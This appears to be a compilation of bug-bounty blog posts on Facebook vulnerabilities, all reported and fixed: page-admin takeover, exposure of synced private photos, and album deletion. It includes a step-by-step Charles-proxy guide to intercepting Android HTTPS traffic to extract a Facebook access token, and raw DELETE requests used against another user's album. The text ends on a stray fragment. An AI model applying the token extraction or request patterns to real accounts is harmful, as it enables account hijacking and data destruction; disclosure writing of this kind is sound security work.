A security vulnerability in Facebook business manager endpoint allows a third party application to hack Facebook account page with limited permissions and the victim will permanently lose admin access to the page.
By default, Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles like a manager, editor, analyst etc.). Third-party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as an admin to the page and remove the actual owner permanently.
On the other hand, there is an endpoint for business pages called userpermissions that allows one to add or remove business page admin roles who are already handling the Facebook business.
The following request would make target user as admin of the page.
After a few minutes of testing, I got to know that removing the business parameter from the request didn’t throw any error and allow us to add anyone as new page admin and delete the actual page admin on the non-business page where the application has manage_pages permission.
That’s it! Whatever the application may be, if it is having the manage_pages permission of the admin then it could hack all of your Facebook account pages in a fraction of seconds.
Reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as a part of their bug bounty program.Even though they placed a fix for this vulnerability, please be aware of the permissions you grant to any applications.
Permissions dialog box would look like this
If manage_pages is requested please note that this app would be able to manage your pages (post statuses, publish photos etc..).
People need not worry, we can still modify the permissions you have granted to other apps here.
One of the most important things in android application penetration testing is “Capturing Android application’s HTTPS traffic”.
Reading HTTP traffic generated by android apps is some what easier than reading HTTPS traffic.
Recently some people asked me about “how to get Facebook for Android access token”. It can be done by intercepting SSL / HTTPS traffic from Facebook application.
So here it goes the easy way to intercept, read and modify SSL network traffic generated by android applications.
Things we need :
1) Android mobile phone.
2) WiFi Internet Connection.
3) Laptop or Desktop with Charles proxy installed.
Note : Desktop/Laptop should be connected to the same network connection where your mobile is connected. i.e. same WiFi connection.
Read their documentation for any help related to installation. By default, charles proxy listens to port number 8888. Charles proxy is available for Windows, Mac and Linux users.
Step 2 : Setup WiFi proxy in your android mobile
In your android mobile, go to Settings > Wi-Fi, long press the active network connection. Select “Modify network” > Tick “Advanced options”. Change none to manual under proxy drop down menu.
Enter your computer’s local IP address (i.e. 192.168.1.100) in host, 8888 in port.
Also, note down the local IP address of your mobile shown at the top of the Modify network menu. Please note that some older versions of android do not support WiFi proxy feature.
Step 3 : Install SSL certificate in android trusted credentials
Before installing ssl certificate, we need to add our android mobile’s local network ip in charles proxy access control list. Proxy – > Access Control Settings in charles proxy.
Add the local IP we got from step 2 to the access control list.
Extract the certificate and copy it to your mobile’s SD storage.
In your mobile, Settings > Security > Install (certificates) from Memory / SD Card and then select the certificate file.
Step 4 : Intercept SSL / HTTPS traffic
We can now intercept all HTTP traffic. For HTTPS, we need to enable SSL proxying in the settings of charles proxy. Proxy > Proxy Settings > SSL and select “Enable SSL proxying”. Add Hostname : * and Port : * in it.
This will add all the domains and ports. You can change the wildcards as per your need.
That’s all we are done.
Charles proxy shows all the requests made from android device. Make use of breakpoints in charles proxy to modify requests and responses.
Now we can read and modify all the traffic (both http and https) generated by android applications which obey android proxy settings.
Some apps disobey android proxy settings, we need to go for rooted android device in that case.
For those who want to get the “Facebook for Android access token”, go to Facebook app in your mobile and you will be able to see the access token in Authorization header of every request sent to graph.facebook.com or api.facebook.com in charles proxy.
I hope this post would be useful. Please let me know if you have any doubts.
Also read how to find Facebook ID of your page or group or profile using our online tool!
What if your private mobile photos got exposed publicly?
All of us have the habit of taking photos using our mobile, in that, there would definitely be some private photos. What if it’s hacked?
This post is about a security vulnerability I found on Facebook which allows any malicious Facebook application to hack your mobile photos (synced).
The Facebook mobile application has a feature called “Sync photos” which help us to keep a backup(up to 2 GB) of our mobile photos. This feature enables the Facebook mobile application to upload all the photos taken by your mobile to your account and it would remain private until you publish it.
Sync photos feature is turned on by default in some mobile phones. We can control it in the app settings. Most of us are unaware of this feature. If you don’t want Facebook to backup your photos, go to app settings and turn it off.
I was really curious to know which endpoint is handling these photos. After a bit of research, I got to know that “vaultimages” endpoint of Facebook Graph API is handling these synced photos. I started exploring through the endpoint. Reading the synced photos through this endpoint got caught in my eyes and it seems vulnerable.
After few minutes of testing, I realized that “vaultimages” endpoint is vulnerable. Bingo! 😀
The Facebook mobile application makes a GET request to https://graph.facebook.com/me/vaultimages with a top-level access token to read the synced photos. Facebook server check the request for a proper access token and serve the synced photos of the respective user as the response.
The vulnerable part is, it just checks the owner of the access token and not the application which is making the request. So it allows any application with user_photos permission to read your mobile photos.
There are large numbers of Facebook applications which use user_photos permission to read user’s public photos.
A malicious app that you are using can hack all of your private photos in few seconds. I know that most of us won’t see the list of permissions while using any application.
Please review the permissions before granting it.
Proof of Concept Video:-
Reported this vulnerability to Facebook Security Team, as usual, they were very fast in addressing this issue. They pushed a fix in less than 30 minutes after the acknowledgement of report. They are simply awesome in this regard!
They just whitelisted their official mobile applications in that endpoint and no other applications can access your private photos anymore.This vulnerability is completely patched and vault images cannot be accessed by any application except the whitelisted applications.
{
"error": {
"message": "(#3) App must be on whitelist",
"type": "OAuthException",
"code": 3
}
}
First Acknowledgement from Facebook Security Team.
Acknowledgement of Fix.
Rewarded me $10,000 USD as a part of their bug bounty program.
I got my name listed in their white-hat honour list for reporting vulnerabilities.
A couple of vulnerabilities (this one and photo deleting vulnerability) took me to the top of the list 😀 I thank Facebook Security Team for quickly patching this issue and also for running bug bounty program.
Fee free to share your thoughts below in comments 🙂
What if your photos get deleted without your knowledge?
Obviously, that’s very disgusting, isn’t it? Yes. this post is regarding a vulnerability I found which allows a malicious user to delete any photo album on Facebook. Any photo album owned by a user or a page or a group could be deleted.
Graph API is the primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write user data. Read more about Graph API here.
According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.
I tried to delete one of my photo albums using graph explorer access token.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=CAACEd…..MUZD
Response :-
{“error”:{“message”:”(#200) Application does not have the capability to make this API call.”,”type”:”OAuthException”,”code”:200}}
Why? Because this application doesn’t have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call 😛
I decided to try it on Facebook for mobile access token because it is a top-level access token which has some extra permissions. Facebook mobile apps use the same Graph API. so took an album id & Facebook for Android access token of mine and tried it.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response:-
true
Album(518171421550249) got deleted 😀 so whats the next step? Took victim’s album id and tried to delete it. I was very curious to see the result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response:-
true
OMG 😀 the album got deleted! So what? I got access to delete all of your Facebook photos (photos which are public or the photos I could see) 😛 lol 😀
Immediately reported this bug to the Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.
Things we need :
